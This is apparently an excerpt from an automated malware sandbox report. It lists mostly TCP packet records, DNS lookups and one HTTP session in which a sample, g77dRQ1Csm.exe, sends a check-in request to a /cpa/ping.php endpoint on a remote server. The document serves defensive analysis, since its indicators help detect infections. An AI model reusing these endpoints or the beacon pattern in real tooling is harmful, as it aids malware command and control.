                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285768032 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285779953 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285780907 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285780907 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285809994 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285834074 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285834074 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285872936 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285875082 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285886049 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285912991 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285954952 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285978079 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.285990000 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286015034 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286039114 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286051989 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286072969 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286072969 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286089897 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286092043 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286113977 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286144972 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286163092 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286183119 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286221027 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286221027 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286302090 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286367893 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286416054 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286428928 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286451101 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286487103 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286526918 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286529064 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286609888 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286619902 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286633015 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286665916 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286716938 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286716938 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286729097 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286741972 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286752939 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286782026 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286802053 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286808968 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286823988 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286853075 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286883116 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286962032 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286969900 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.286969900 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287000895 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287014008 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287028074 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287071943 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287071943 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287092924 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287156105 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287157059 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287198067 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287199020 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287211895 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287251949 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287286043 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287341118 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287353039 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287364960 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287377119 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287398100 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287398100 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287419081 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287431002 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287441969 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287456036 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287475109 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287493944 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287599087 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287611961 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287641048 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287672043 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287679911 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287703991 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287717104 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287739038 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287751913 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287795067 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287797928 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287866116 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287883997 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287898064 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287898064 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287935019 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287940025 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287971973 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.287997961 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288006067 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288033009 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288055897 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288063049 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288084030 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288095951 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288109064 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288119078 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288146019 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288187981 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288249016 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288252115 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288281918 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288300991 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288312912 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288342953 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288345098 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288345098 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288383007 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288386106 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288398027 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288479090 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288486958 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288530111 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288532972 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288542032 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288606882 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288671017 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288682938 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288707972 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288753033 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288759947 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288810968 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288851023 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288851023 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288851023 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.288896084 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289108992 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289120913 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289153099 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289216995 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289233923 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289253950 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289253950 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289253950 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289268970 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289288044 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289319992 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289320946 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289366007 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289382935 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289395094 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289469004 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289508104 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289508104 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289508104 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289525986 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289572001 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289602995 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289614916 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289664984 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289668083 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289736032 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289747953 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289764881 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289766073 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289782047 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289813995 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289844036 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289855957 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289892912 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289897919 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289933920 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289963961 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.289997101 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290040016 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290040016 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290067911 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290091038 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290102959 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290131092 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290160894 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290194035 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290195942 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290241003 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290261984 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290297031 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290306091 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290354013 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290373087 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290402889 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290402889 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290415049 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290450096 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290481091 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290551901 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290606976 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290612936 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290637016 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290649891 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290683985 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290699005 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290746927 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290754080 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290788889 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290811062 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290848017 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290868998 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290913105 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290942907 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290973902 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290973902 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.290992022 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291006088 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291054010 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291065931 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291105986 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291107893 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291142941 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291160107 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291172981 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291227102 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291239023 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291243076 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291273117 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291297913 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291304111 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291410923 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291413069 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291423082 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291445017 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291470051 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291479111 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291490078 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291554928 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291558981 CEST8049733176.97.76.106192.168.2.4
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.291635990 CEST4973380192.168.2.4176.97.76.106
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Apr 25, 2024 09:03:59.391366005 CEST192.168.2.41.1.1.10x5386Standard query (0)note.padd.cn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:09.964881897 CEST192.168.2.41.1.1.10xad2eStandard query (0)svc.iolo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:15.443955898 CEST192.168.2.41.1.1.10x37cStandard query (0)download.iolo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:39.035950899 CEST192.168.2.41.1.1.10x1813Standard query (0)westus2-2.in.applicationinsights.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                            Apr 25, 2024 09:03:59.866235018 CEST1.1.1.1192.168.2.40x5386No error (0)note.padd.cn.com176.97.76.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:10.077796936 CEST1.1.1.1192.168.2.40xad2eNo error (0)svc.iolo.com20.157.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:11.587528944 CEST1.1.1.1192.168.2.40xf2e9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:11.587528944 CEST1.1.1.1192.168.2.40xf2e9No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:15.572724104 CEST1.1.1.1192.168.2.40x37cNo error (0)download.iolo.netiolo0.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:15.572724104 CEST1.1.1.1192.168.2.40x37cNo error (0)iolo0.b-cdn.net169.150.236.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:39.262132883 CEST1.1.1.1192.168.2.40x1813No error (0)westus2-2.in.applicationinsights.azure.comwestus2-2.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:39.262132883 CEST1.1.1.1192.168.2.40x1813No error (0)westus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Apr 25, 2024 09:04:39.262132883 CEST1.1.1.1192.168.2.40x1813No error (0)westus2-2.in.ai.privatelink.monitor.azure.comgig-ai-prod-westus2-0.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            0192.168.2.449730185.172.128.90805288C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:03:55.326591969 CEST205OUTGET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.90
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 25, 2024 09:03:57.090905905 CEST148INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:03:55 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Data Raw: 31
                                                                                                                                                                                                                            Data Ascii: 1


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            1192.168.2.449731185.172.128.228805288C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
